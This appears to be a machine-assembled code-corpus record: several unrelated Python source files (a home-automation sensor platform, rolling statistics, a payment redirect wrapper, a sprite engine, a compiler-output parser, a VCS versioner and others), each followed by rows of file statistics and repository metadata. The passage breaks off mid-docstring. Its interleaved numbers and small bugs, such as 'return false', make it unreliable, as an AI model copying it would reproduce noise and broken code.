import voluptuous as vol from pi4home.components import text_sensor import pi4home.config_validation as cv from pi4home.const import CONF_ID, CONF_LAMBDA, CONF_NAME, CONF_TEXT_SENSORS from pi4home.cpp_generator import add, process_lambda, variable from pi4home.cpp_types import std_vector CustomTextSensorConstructor = text_sensor.text_sensor_ns.class_('CustomTextSensorConstructor') PLATFORM_SCHEMA = text_sensor.PLATFORM_SCHEMA.extend({ cv.GenerateID(): cv.declare_variable_id(CustomTextSensorConstructor), vol.Required(CONF_LAMBDA): cv.lambda_, vol.Required(CONF_TEXT_SENSORS): cv.ensure_list(text_sensor.TEXT_SENSOR_SCHEMA.extend({ cv.GenerateID(): cv.declare_variable_id(text_sensor.TextSensor), })), }) def to_code(config): for template_ in process_lambda(config[CONF_LAMBDA], [], return_type=std_vector.template(text_sensor.TextSensorPtr)): yield rhs = CustomTextSensorConstructor(template_) custom = variable(config[CONF_ID], rhs) for i, conf in enumerate(config[CONF_TEXT_SENSORS]): rhs = custom.Pget_text_sensor(i) add(rhs.set_name(conf[CONF_NAME])) text_sensor.register_text_sensor(rhs, conf) BUILD_FLAGS = '-DUSE_CUSTOM_TEXT_SENSOR'
36.485714
96
0.750196
161
1,277
5.621118
0.360248
0.132597
0.049724
0.044199
0.095028
0.095028
0.095028
0.095028
0
0
0
0.004673
0.162099
1,277
34
97
37.558824
0.841122
0
0
0
0
0
0.039937
0.039937
0
0
0
0
0
1
0.038462
false
0
0.230769
0
0.269231
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc8d13384d848da3326a2122e88d0a41453ccdd
4,589
py
Python
rolling_measures/rolling_measures/__init__.py
marketler/GFW_vessel_scoring
16a141e78258dcc9bab458d5ebd8fad6d2721816
[ "Apache-2.0" ]
null
null
null
rolling_measures/rolling_measures/__init__.py
marketler/GFW_vessel_scoring
16a141e78258dcc9bab458d5ebd8fad6d2721816
[ "Apache-2.0" ]
null
null
null
rolling_measures/rolling_measures/__init__.py
marketler/GFW_vessel_scoring
16a141e78258dcc9bab458d5ebd8fad6d2721816
[ "Apache-2.0" ]
null
null
null
import math import operator import six class NegativePopulationSize(ValueError): def __init__(self, typename): self.typename = typename ValueError.__init__(self) def __str__(self): return str(str(self)) def __unicode__(self): return "More calls to %(type)s.remove() than to %(type)s.add()" % {"type": self.typename} class NonPositivePopulationSize(ValueError): def __init__(self, typename): self.typename = typename ValueError.__init__(self) def __str__(self): return str(str(self)) def __unicode__(self): return "Need more calls to %(type)s.add() than to %(type)s.remove()" % {"type": self.typename} class AbstractStdDev(object): def get(self): return math.sqrt(self.getSqr()) def __add__(self, other): return StdDevSum(self.getSqr() + other.getSqr()) class StdDevSum(AbstractStdDev): def __init__(self, sqr): self.sqr = sqr def getSqr(self): return self.sqr class StdDev(AbstractStdDev): def __init__(self): self.count = 0 self.sum = 0 self.sqrsum = 0 def add(self, value): self.count += 1 self.sum += value self.sqrsum += value**2 def remove(self, value): if self.count < 1: raise NonPositivePopulationSize("StdDev") self.count -= 1 self.sum -= value self.sqrsum -= value**2 def getSqr(self): if self.count < 1: raise NonPositivePopulationSize("StdDev") a = self.sqrsum/self.count b = (self.sum/self.count)**2 # Handle rounding errors # FIXME: find out what values this happened for and make a test... if a < b: # pragma: no cover assert b - a < 1e-3 return 0.0 return a - b class Avg(object): def __init__(self): self.count = 0 self.sum = 0 def add(self, value): self.count += 1 self.sum += value def remove(self, value): if self.count <= 1: raise NonPositivePopulationSize("Avg") self.count -= 1 self.sum -= value def get(self): if self.count < 1: raise NonPositivePopulationSize("Avg") return self.sum/self.count class Sum(object): def __init__(self): self.count = 0 self.sum = 0 def add(self, value): self.count += 1 self.sum += value def remove(self, value): if self.count <= 0: raise NegativePopulationSize("Sum") self.count -= 1 self.sum -= value def get(self): return self.sum class Count(object): def __init__(self): self.count = 0 def add(self, value): self.count += 1 def remove(self, value): # Fast failure if self.count <= 0: raise NegativePopulationSize("Sum") self.count -= 1 def get(self): return self.count class Stat(object): def __init__(self, source, cls): self.source = source self.value = cls() def add(self, value): if self.source in value: self.value.add(value[self.source]) def remove(self, value): if self.source in value: self.value.remove(value[self.source]) def get(self): return self.value.get() class StatSum(object): def __init__(self, *stats): self.stats = stats def add(self, value): for stat in self.stats: stat.add(value) def remove(self, value): for stat in self.stats: stat.remove(value) def get(self): summed = self.stats[0].value for x in self.stats[1:]: summed = summed + x.value return summed.get() # return reduce(operator.add, [stat.value for stat in self.stats]).get() class Stats(object): """ stat = Stats({ "latitude": Stat("latitude", Avg), "longitude": Stat("longitude", Avg), "sigma": StatSum(Stat("latitude", StdDev), Stat("longitude", StdDev))}) stat.add({'latitude': 4.3, 'longitude': 3.2}) print stat.get()['sigma'] """ def __init__(self, fieldmap): self.fieldmap = fieldmap def add(self, value): for field in six.itervalues(self.fieldmap): field.add(value) def remove(self, value): for field in six.itervalues(self.fieldmap): field.remove(value) def get(self): return { key: value.get() for (key, value) in six.iteritems(self.fieldmap)}
28.503106
102
0.568098
561
4,589
4.525847
0.153298
0.077983
0.047263
0.041355
0.54746
0.491532
0.478929
0.413549
0.378889
0.317054
0
0.011055
0.310089
4,589
160
103
28.68125
0.790903
0.098714
0
0.574627
0
0
0.035435
0
0
0
0
0.00625
0.007463
1
0.283582
false
0
0.022388
0.08209
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
bdcbad672362d3c6fe25962d2ca5b1424db44011
1,186
py
Python
lib/python2.7/site-packages/braintree/transparent_redirect.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
3
2015-11-05T08:57:12.000Z
2016-07-17T18:10:55.000Z
lib/python2.7/site-packages/braintree/transparent_redirect.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
13
2020-03-24T17:53:51.000Z
2022-02-10T20:01:14.000Z
lib/python2.7/site-packages/braintree/transparent_redirect.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
2
2019-04-29T14:16:10.000Z
2020-07-23T12:04:17.000Z
import braintree from braintree.configuration import Configuration class TransparentRedirect: """ A class used for Transparent Redirect operations """ class Kind(object): CreateCustomer = "create_customer" UpdateCustomer = "update_customer" CreatePaymentMethod = "create_payment_method" UpdatePaymentMethod = "update_payment_method" CreateTransaction = "create_transaction" @staticmethod def confirm(query_string): """ Confirms a transparent redirect request. It expects the query string from the redirect request. The query string should _not_ include the leading "?" character. :: result = braintree.TransparentRedirect.confirm("foo=bar&id=12345") """ return Configuration.gateway().transparent_redirect.confirm(query_string) @staticmethod def tr_data(data, redirect_url): return Configuration.gateway().transparent_redirect.tr_data(data, redirect_url) @staticmethod def url(): """ Returns the url for POSTing Transparent Redirect HTML forms """ return Configuration.gateway().transparent_redirect.url()
31.210526
93
0.693929
115
1,186
7
0.469565
0.141615
0.096894
0.137888
0.219876
0
0
0
0
0
0
0.00547
0.229342
1,186
37
94
32.054054
0.875274
0.290051
0
0.166667
0
0
0.117955
0.055046
0
0
0
0
0
1
0.166667
false
0
0.111111
0.055556
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
bdcc6ad7468791c7a47fc038f3016e03c535f1fc
197
py
Python
fluentogram/src/abc/__init__.py
Arustinal/fluentogram
c3d7b307b40d520ef1db5e2a0945f3d7fe269b78
[ "MIT" ]
null
null
null
fluentogram/src/abc/__init__.py
Arustinal/fluentogram
c3d7b307b40d520ef1db5e2a0945f3d7fe269b78
[ "MIT" ]
null
null
null
fluentogram/src/abc/__init__.py
Arustinal/fluentogram
c3d7b307b40d520ef1db5e2a0945f3d7fe269b78
[ "MIT" ]
null
null
null
# coding=utf-8 from .misc import AbstractAttribTracer from .transformer import AbstractDataTransformer from .translator import AbstractTranslator from .translator_hub import AbstractTranslatorsHub
32.833333
50
0.873096
20
197
8.55
0.65
0.163743
0
0
0
0
0
0
0
0
0
0.005587
0.091371
197
5
51
39.4
0.949721
0.060914
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
5
bdcc6e536cb58033fe61c7df47d8e2e7c55ae4c2
1,902
py
Python
awsume/autoawsume/process.py
ignatenkobrain/awsume
8191c35e8d60495e608c77801698c0a1a332d76f
[ "MIT" ]
654
2016-04-05T16:51:22.000Z
2022-03-28T21:07:30.000Z
awsume/autoawsume/process.py
ignatenkobrain/awsume
8191c35e8d60495e608c77801698c0a1a332d76f
[ "MIT" ]
149
2016-12-01T17:30:58.000Z
2022-03-29T23:49:50.000Z
awsume/autoawsume/process.py
ignatenkobrain/awsume
8191c35e8d60495e608c77801698c0a1a332d76f
[ "MIT" ]
90
2016-04-12T00:50:04.000Z
2022-03-30T20:44:45.000Z
import argparse import psutil from ..awsumepy.lib.aws_files import delete_section, get_aws_files, read_aws_file from ..awsumepy.lib.logger import logger def kill_autoawsume(): logger.debug('Killing autoawsume') for proc in psutil.process_iter(): try: for command_string in proc.cmdline(): if 'autoawsume' in command_string: proc.kill() except Exception: pass def kill(arguments: argparse.Namespace): _, credentials_file = get_aws_files(None, None) if arguments.profile_name: logger.debug('Stoping auto-refresh of profile {}'.format(arguments.profile_name)) profiles = read_aws_file(credentials_file) if 'autoawsume-{}'.format(arguments.profile_name) in profiles: delete_section('autoawsume-{}'.format(arguments.profile_name), credentials_file) profiles.pop('autoawsume-{}'.format(arguments.profile_name)) if arguments.profile_name in profiles and profiles[arguments.profile_name].get('autoawsume'): delete_section(arguments.profile_name, credentials_file) profiles.pop(arguments.profile_name) autoawsume_profiles = [{k: v} for k, v in profiles.items() if v.get('autoawsume')] if any(autoawsume_profiles): print('Stop {}'.format(arguments.profile_name)) return else: logger.debug('There were not more autoawsume profiles, stopping autoawsume') print('Kill') kill_autoawsume() else: logger.debug('Stopping all auto refreshing and removing autoawsume profiles') kill_autoawsume() profiles = read_aws_file(credentials_file) for profile in profiles: if 'autoawsume-' in profile or profiles[profile].get('autoawsume'): delete_section(profile, credentials_file) print('Kill')
41.347826
101
0.664038
215
1,902
5.688372
0.293023
0.130826
0.163532
0.106296
0.235487
0.130826
0.075225
0
0
0
0
0
0.239222
1,902
45
102
42.266667
0.845197
0
0
0.2
0
0
0.146162
0
0
0
0
0
0
1
0.05
false
0.025
0.1
0
0.175
0.075
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdcd63c3f87c9cdba74f8e75512a7d40eef94fd9
8,787
py
Python
engine/sprite.py
amirgeva/retroupy
1ee19b36a72c5f592cce150d1d0382a00ccdc4a0
[ "BSD-3-Clause" ]
null
null
null
engine/sprite.py
amirgeva/retroupy
1ee19b36a72c5f592cce150d1d0382a00ccdc4a0
[ "BSD-3-Clause" ]
null
null
null
engine/sprite.py
amirgeva/retroupy
1ee19b36a72c5f592cce150d1d0382a00ccdc4a0
[ "BSD-3-Clause" ]
null
null
null
import json import os import gc from .app import get_screen from .utils import Rect from .bitmatrix import BitMatrix class SpritesManager: def __init__(self): self.free_indices = [] self.last_used = -1 self.limit = 160 def clear(self): self.free_indices = [] self.last_used = -1 def allocate(self, data): if len(self.free_indices) > 0: sprite_id = self.free_indices[-1] del self.free_indices[-1] else: sprite_id = self.last_used + 1 if sprite_id >= self.limit: return -1 self.last_used = sprite_id get_screen().set_sprite(sprite_id, data) return sprite_id sprites_manager = SpritesManager() class SpriteSheet: def __init__(self, filename=''): self.width = 0 self.height = 0 self.data = None self.sprites = {} self.rect = None if filename: self.load(filename) def clean(self): self.data = None gc.collect() def load(self, filename): try: gc.collect() print("Loading "+filename) print("Free Mem: "+str(gc.mem_free())) with open(filename, 'rb') as f: data = f.read(4) self.width = (int(data[1]) << 8) | int(data[0]) self.height = (int(data[3]) << 8) | int(data[2]) data = None self.data = f.read() self.rect = Rect(0, 0, self.width, self.height) return True except OSError: return False def get_sprite_data(self, rect): if rect in self.sprites: return self.sprites.get(rect) if rect.valid() and self.rect.contains(rect) and rect.width() == 32 and rect.height() == 32: data = bytearray(32 * 32 * 2) src = (rect.tl.y * self.width + rect.tl.x) * 2 dst = 0 mask = BitMatrix(32, 32) mask.setall(True) for i in range(32): data[dst:(dst + 64)] = self.data[src:(src + 64)] for j in range(32): if data[dst + j * 2] == 0x20 and data[dst + j * 2 + 1] == 0: mask.set(j, i, False) dst = dst + 64 src = src + self.width * 2 sprite_data = sprites_manager.allocate(bytes(data)), mask self.sprites[rect] = sprite_data else: sprite_data = -1, None return sprite_data sprite_sheets = {} def get_sprite_sheet(filename): if filename in sprite_sheets: return sprite_sheets.get(filename) s = SpriteSheet(filename) sprite_sheets[filename] = s return s # EXPORT class Sprite(object): def __init__(self, sprite_id, mask, duration=0.0, flags=0): self.sprite_id = sprite_id self.mask = mask self.duration = duration self.flags = flags def draw(self, position): get_screen().draw_sprite(position.x, position.y, self.sprite_id, self.flags) @staticmethod def get_rect(): return Rect(0, 0, 32, 32) @staticmethod def deserialize(filename, obj): r = [int(a) for a in obj['Rect'].strip().split(',')] dur = obj['Duration'] flags = 0 if 'Flags' in obj: flags = obj['Flags'] rect = Rect(r[0], r[1], r[2], r[3]) sheet = get_sprite_sheet(filename) sprite_id, mask = sheet.get_sprite_data(rect) return Sprite(sprite_id, mask, dur, flags) # EXPORT class AnimationSequence(object): def __init__(self, name, base_vel=1.0): self.name = name self.base_vel = base_vel self.sprites = [] def add_sprite(self, sprite): self.sprites.append(sprite) def deserialize(self, filename, seq): self.sprites = [] for frame in seq['Frames']: self.add_sprite(Sprite.deserialize(filename, frame)) def __getitem__(self, index): return self.sprites[index] def __len__(self): return len(self.sprites) # EXPORT class StaticSprite: def __init__(self, sprite=None): self.sprite = sprite def get_current_sprite(self): return self.sprite def get_rect(self): if self.sprite: return self.sprite.get_rect() return Rect(0, 0, 32, 32) def draw(self, pos): if self.sprite: self.sprite.draw(pos) # EXPORT class AnimatedSprite(object): def __init__(self): self.sheet = None self.sequences = {} self.flags = {} self.active_sequence = None self.cur_sprite = 0 self.dt = 0.0 self.anim_dir = '' def add_flag(self, name, value): if name == 'AnimDir': self.anim_dir = value self.flags[name] = value def get_longest_sequence(self): mx = 0 res = None for name in self.sequences: seq = self.sequences.get(name) if len(seq) > mx: mx = len(seq) res = seq return res def get_sequence_by_name(self, name): return self.sequences.get(name) def get_sequence_by_index(self, index): for name in self.sequences.keys(): if index == 0: return self.sequences.get(name) index -= 1 return None def get_active_sequence_name(self): if not self.active_sequence: return '' return self.active_sequence.name def set_active_sequence(self, name): if name != self.get_active_sequence_name() and name in self.sequences: self.active_sequence = self.sequences.get(name) self.dt = 0.0 self.cur_sprite = 0 def add_sequence(self, seq): self.sequences[seq.name] = seq if not self.active_sequence: self.active_sequence = seq def calculate_axial_velocity(self, velocity): if self.anim_dir == 'X': return abs(velocity.x) if self.anim_dir == 'Y': return abs(velocity.y) return velocity.length() def advance(self, dt, velocity): axial_velocity = self.calculate_axial_velocity(velocity) # print "axial={}".format(axial_velocity) if self.active_sequence and len(self.active_sequence) > 0: mult = 1.0 if self.active_sequence.base_vel > 0 and axial_velocity > 0.001: mult = axial_velocity / self.active_sequence.base_vel # print "mult={}".format(mult) self.dt = self.dt + dt * mult # print "self.dt={}".format(self.dt) if self.cur_sprite >= len(self.active_sequence): self.cur_sprite = 0 spr = self.active_sequence[self.cur_sprite] while self.dt >= spr.duration: self.dt = self.dt - spr.duration self.cur_sprite += 1 if self.cur_sprite >= len(self.active_sequence): self.cur_sprite = 0 return True def get_current_sprite(self): if self.active_sequence: return self.active_sequence[self.cur_sprite] return None def get_current_height(self): spr = self.get_current_sprite() if spr: return spr.height() return 0 def draw(self, position): spr = self.get_current_sprite() if spr: spr.draw(position) def get_rect(self): spr = self.get_current_sprite() if spr: return spr.get_rect() return Rect(0, 0, 1, 1) def deserialize(self, obj, overrides): filename = obj['Image'] flags = obj['Flags'] for key in flags: self.add_flag(key, flags[key]) for seq in obj['Sequences']: base_vel = seq['BaseVelocity'] if 'BaseVelocity' in overrides: base_vel = overrides.get('BaseVelocity') s = AnimationSequence(seq['Name'], base_vel) s.deserialize(filename, seq) self.add_sequence(s) for name in sprite_sheets: sprite_sheets.get(name).clean() def load(self, filename, overrides={}): return self.deserialize(json.load(open(filename, "r")), overrides) # EXPORT def load_json_file(filename): obj = json.load(open(filename, "r")) a = AnimatedSprite() a.deserialize(obj) return a # EXPORT def load_json_str(s): obj = json.loads(s) a = AnimatedSprite() a.deserialize(obj) return a # EXPORT def load_file(filename): return load_json_file(filename) # EXPORT def load_str(s): return load_json_str(s) if __name__ == '__main__': print(os.getcwd())
27.719243
100
0.561739
1,102
8,787
4.315789
0.137931
0.052986
0.05677
0.027754
0.178091
0.105341
0.08831
0.082422
0.059294
0.059294
0
0.017315
0.329578
8,787
316
101
27.806962
0.790019
0.018095
0
0.228571
0
0
0.01474
0
0
0
0.000464
0
0
1
0.167347
false
0
0.02449
0.032653
0.363265
0.012245
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdcdd065ac669fb99de9c3ef2f470429acaafd67
1,562
py
Python
models/room.py
kwahalf/data-structures
19ebcbee6108e9b843bace4e7264e5e9e5c5c6fd
[ "MIT" ]
1
2018-12-28T23:56:08.000Z
2018-12-28T23:56:08.000Z
models/room.py
kwahalf/data-structures
19ebcbee6108e9b843bace4e7264e5e9e5c5c6fd
[ "MIT" ]
null
null
null
models/room.py
kwahalf/data-structures
19ebcbee6108e9b843bace4e7264e5e9e5c5c6fd
[ "MIT" ]
null
null
null
from abc import ABCMeta, abstractmethod class Room(object): """class Room""" __metaclass__ = ABCMeta room_count = 0 def __init__(self, name=None, max_capacity=None): self.room_id = self.room_count self.room_count += 1 self.name = name self.max_capacity = max_capacity self.occupants = [] def add_occupant(self, occupant): if self.is_full(): return false self.occupants.append(occupant) return True def remove_occupant(self, occupant): if self.is_an_occupant(occupant): self.occupants.remove(occupant) return True return false def is_an_occupant(self, occupant): return occupant in self.occupants def is_full(self): return len(self.occupants) >= self.max_capacity def __repr__(self): return '%s(name=%s, purpose=%s, max_capacity=%s)' % ( self.__class__.__name__, self.name, self.purpose, self.max_capacity ) def __str__(self): return Self.name class OfficeSpace(Room): """class OfficeSpace """ def __init__(self, name=None, max_capacity=6): Room.__init__(self, name=name, max_capacity=max_capacity) self.purpose = "OFFICE" class LivingSpace(Room): """class LivingSpace """ def __init__(self, name=None, max_capacity=4): Room.__init__(self, name=name, max_capacity=max_capacity) self.purpose = "LIVINGSPACE"
27.892857
65
0.599232
179
1,562
4.871508
0.240223
0.151376
0.068807
0.051606
0.318807
0.288991
0.224771
0.12156
0.12156
0.12156
0
0.003663
0.300896
1,562
56
66
27.892857
0.794872
0.03073
0
0.146341
0
0
0.038025
0
0
0
0
0
0
1
0.219512
false
0
0.02439
0.097561
0.560976
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
bdcde9db518399671885520f0ddbde248285fab9
3,972
py
Python
tools/checker/file_format/c1visualizer/parser.py
lifansama/xposed_art_n
ec3fbe417d74d4664cec053d91dd4e3881176374
[ "MIT" ]
234
2017-07-18T05:30:27.000Z
2022-01-07T02:21:31.000Z
tools/checker/file_format/c1visualizer/parser.py
lifansama/xposed_art_n
ec3fbe417d74d4664cec053d91dd4e3881176374
[ "MIT" ]
21
2017-07-18T04:56:09.000Z
2018-08-10T17:32:16.000Z
tools/checker/file_format/c1visualizer/parser.py
lifansama/xposed_art_n
ec3fbe417d74d4664cec053d91dd4e3881176374
[ "MIT" ]
56
2017-07-18T10:37:10.000Z
2022-01-07T02:19:22.000Z
# Copyright (C) 2014 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from common.logger import Logger from file_format.common import SplitStream from file_format.c1visualizer.struct import C1visualizerFile, C1visualizerPass import re class C1ParserState: OutsideBlock, InsideCompilationBlock, StartingCfgBlock, InsideCfgBlock = range(4) def __init__(self): self.currentState = C1ParserState.OutsideBlock self.lastMethodName = None def __parseC1Line(line, lineNo, state, fileName): """ This function is invoked on each line of the output file and returns a triplet which instructs the parser how the line should be handled. If the line is to be included in the current group, it is returned in the first value. If the line starts a new output group, the name of the group is returned in the second value. The third value is only here to make the function prototype compatible with `SplitStream` and is always set to `None` here. """ if state.currentState == C1ParserState.StartingCfgBlock: # Previous line started a new 'cfg' block which means that this one must # contain the name of the pass (this is enforced by C1visualizer). if re.match("name\s+\"[^\"]+\"", line): # Extract the pass name, prepend it with the name of the method and # return as the beginning of a new group. state.currentState = C1ParserState.InsideCfgBlock return (None, state.lastMethodName + " " + line.split("\"")[1], None) else: Logger.fail("Expected output group name", fileName, lineNo) elif state.currentState == C1ParserState.InsideCfgBlock: if line == "end_cfg": state.currentState = C1ParserState.OutsideBlock return (None, None, None) else: return (line, None, None) elif state.currentState == C1ParserState.InsideCompilationBlock: # Search for the method's name. Format: method "<name>" if re.match("method\s+\"[^\"]*\"", line): methodName = line.split("\"")[1].strip() if not methodName: Logger.fail("Empty method name in output", fileName, lineNo) state.lastMethodName = methodName elif line == "end_compilation": state.currentState = C1ParserState.OutsideBlock return (None, None, None) else: assert state.currentState == C1ParserState.OutsideBlock if line == "begin_cfg": # The line starts a new group but we'll wait until the next line from # which we can extract the name of the pass. if state.lastMethodName is None: Logger.fail("Expected method header", fileName, lineNo) state.currentState = C1ParserState.StartingCfgBlock return (None, None, None) elif line == "begin_compilation": state.currentState = C1ParserState.InsideCompilationBlock return (None, None, None) else: Logger.fail("C1visualizer line not inside a group", fileName, lineNo) def ParseC1visualizerStream(fileName, stream): c1File = C1visualizerFile(fileName) state = C1ParserState() fnProcessLine = lambda line, lineNo: __parseC1Line(line, lineNo, state, fileName) fnLineOutsideChunk = lambda line, lineNo: \ Logger.fail("C1visualizer line not inside a group", fileName, lineNo) for passName, passLines, startLineNo, testArch in \ SplitStream(stream, fnProcessLine, fnLineOutsideChunk): C1visualizerPass(c1File, passName, passLines, startLineNo + 1) return c1File
43.648352
83
0.716012
500
3,972
5.66
0.36
0.088339
0.095406
0.016961
0.139223
0.084099
0.084099
0.084099
0.084099
0.038869
0
0.01198
0.20141
3,972
90
84
44.133333
0.880202
0.357754
0
0.226415
0
0
0.0893
0
0
0
0
0
0.018868
1
0.056604
false
0.056604
0.075472
0
0.283019
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
bdcfa69692cd0e84e62228bc835f2c497955444e
10,882
py
Python
natcap/versioner/versioning.py
natcap/versioner
65e4c1cf38115dcfec260f0d186cedca192b0b2e
[ "BSD-3-Clause" ]
null
null
null
natcap/versioner/versioning.py
natcap/versioner
65e4c1cf38115dcfec260f0d186cedca192b0b2e
[ "BSD-3-Clause" ]
null
null
null
natcap/versioner/versioning.py
natcap/versioner
65e4c1cf38115dcfec260f0d186cedca192b0b2e
[ "BSD-3-Clause" ]
null
null
null
from __future__ import absolute_import import logging import os import re import subprocess import six LOGGER = logging.getLogger('natcap.versioner.versioning') LOGGER.setLevel(logging.ERROR) class VCSQuerier(object): name = 'VCS' is_archive = False repo_data_location = '' def __init__(self, repo_path): repo_root = self._find_repo_root(repo_path) if not repo_root: raise ValueError('Not within a %s repository: %s' % ( self.name, repo_path)) self._repo_path = repo_root def _find_repo_root(self, dirpath): """Walk up the directory tree and locate the directory that contains the repo data.""" abs_repo_path = os.path.abspath(dirpath) def _locate_data(path): # base case: we can't go up another directory and still haven't # found the repo data. if os.path.dirname(path) == path: return None if os.path.exists(os.path.join(path, self.repo_data_location)): return path return _locate_data(os.path.dirname(path)) return _locate_data(abs_repo_path) def _run_command(self, cmd, cwd=None): """Run a subprocess.Popen command. All output to stdout, stdin and stderr will be treated as stdout, captured, and returned. Commands are executed as shell commands. Parameters: cmd (string) - a python string to be executed in the shell. cwd=None (string or None) - the string path to the directory on disk to use as the CWD. If None, the current CWD will be used. Returns: A python bytestring of the output of the given command.""" p = subprocess.check_output( cmd, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=cwd) return p.strip().decode('utf-8') # output without leading/trailing newlines @property def tag_distance(self): raise NotImplementedError @property def build_id(self): raise NotImplementedError @property def latest_tag(self): raise NotImplementedError @property def branch(self): raise NotImplementedError @property def node(self): raise NotImplementedError @property def release_version(self): """This function gets the release version. Returns either the latest tag (if we're on a release tag) or None, if we're on a dev changeset.""" if self.tag_distance == 0: return self.latest_tag return None @property def version(self): """This function gets the module's version string. This will be either the dev build ID (if we're on a dev build) or the current tag if we're on a known tag. Either way, the return type is a string.""" release_version = self.release_version if release_version is None: return self.build_dev_id(self.build_id) return release_version def build_dev_id(self, build_id=None): """This function builds the dev version string. Returns a string.""" if build_id is None: build_id = self.build_id return 'dev%s' % (build_id) def pep440(self, branch=True, method='post'): assert method in ['pre', 'post'], ('Versioning method %s ' 'not valid') % method # If we're at a tag, return the tag only. if self.tag_distance == 0: return self.latest_tag template_string = "%(latesttag)s.%(method)s%(tagdist)s+n%(node)s" if branch is True: template_string += "-%(branch)s" latest_tag = self.latest_tag if method == 'pre': latest_tag = _increment_tag(latest_tag) data = { 'tagdist': self.tag_distance, 'latesttag': latest_tag, 'node': self.node, 'branch': self.branch, 'method': method, } version_string = template_string % data return version_string class HgArchive(VCSQuerier): name = 'Mercurial Archive' shortnode_len = 12 is_archive = True repo_data_location = '.hg_archival.txt' @property def build_id(self): attrs = _get_archive_attrs(self._repo_path) return '{latesttagdistance}:{latesttag} [{node}]'.format( latesttagdistance=attrs['latesttagdistance'], latesttag=attrs['latesttag'], node=attrs['node'][:self.shortnode_len], ) @property def tag_distance(self): try: return _get_archive_attrs(self._repo_path)['latesttagdistance'] except KeyError: # This happens when we are at a tag. return 0 @property def latest_tag(self): attrs = _get_archive_attrs(self._repo_path) try: return six.text_type(attrs['latesttag']) except KeyError: # This happens when we are at a tag. return six.text_type(attrs['tag']) @property def branch(self): return _get_archive_attrs(self._repo_path)['branch'] @property def node(self): return _get_archive_attrs(self._repo_path)['node'][:self.shortnode_len] class HgRepo(VCSQuerier): name = 'Mercurial' is_archive = False repo_data_location = '.hg' def _log_template(self, template_string): hg_call = 'hg log -r . --config ui.report_untrusted=False' cmd = (hg_call + ' --template="%s"') % template_string return self._run_command(cmd, cwd=self._repo_path) @property def build_id(self): """Call mercurial with a template argument to get the build ID. Returns a python bytestring.""" return self._log_template('{latesttagdistance}:{latesttag} ' '[{node|short}]') @property def tag_distance(self): """Call mercurial with a template argument to get the distance to the latest tag. Returns an int.""" return int(self._log_template('{latesttagdistance}')) @property def latest_tag(self): """Call mercurial with a template argument to get the latest tag. Returns a python bytestring.""" return self._log_template('{latesttag}') @property def branch(self): """Get the current branch from hg.""" return self._log_template('{branch}') @property def node(self): return self._log_template('{node|short}') class GitRepo(VCSQuerier): name = 'Git' repo_data_location = '.git' def __init__(self, repo_path): VCSQuerier.__init__(self, repo_path) self._tag_distance = None self._latest_tag = None self._commit_hash = None def _run_command(self, cmd): return VCSQuerier._run_command(self, cmd, self._repo_path) @property def branch(self): branch_cmd = 'git branch' current_branches = self._run_command(branch_cmd) for line in current_branches.split('\n'): if line.startswith('* '): return line.replace('* ', '').strip() raise IOError('Could not detect current branch') def _describe_current_rev(self): self._tag_distance = None self._latest_tag = None self._commit_hash = None current_branch = self.branch try: data = self._run_command('git describe --tags') except subprocess.CalledProcessError: # when there are no tags self._latest_tag = 'null' num_commits_cmd = 'git rev-list %s --count' % current_branch self._tag_distance = self._run_command(num_commits_cmd) commit_hash_cmd = 'git log -1 --pretty="format:%h"' self._commit_hash = self._run_command(commit_hash_cmd) else: if '-' not in data: # then we're at a tag self._latest_tag = str(data) self._tag_distance = 0 commit_hash_cmd = 'git log -1 --pretty="format:%h"' self._commit_hash = self._run_command(commit_hash_cmd) else: # we're not at a tag, so data has the format: # data = tagname-tagdistange-commit_hash tagname, tag_dist, _commit_hash = data.split('-') self._tag_distance = int(tag_dist) self._latest_tag = tagname self._commit_hash = self.node @property def build_id(self): self._describe_current_rev() return "%s:%s [%s]" % (self._tag_distance, self._latest_tag, self._commit_hash) @property def tag_distance(self): self._describe_current_rev() return self._tag_distance @property def latest_tag(self): self._describe_current_rev() return self._latest_tag @property def node(self): return self._run_command('git rev-parse HEAD').strip()[:8] @property def is_archive(self): # Archives are a mercurial feature. return False def _increment_tag(version_string): assert len(re.findall('([0-9].?)+', version_string)) >= 1, ( 'Version string must be a release') # increment the minor version number and not the update num. tag = [int(s) for s in version_string.split('.')] tag[-1] += 1 return '.'.join([str(i) for i in tag]) def _get_archive_attrs(archive_path): """ If we're in an hg archive, there will be a file '.hg_archival.txt' in the repo root. If this is the 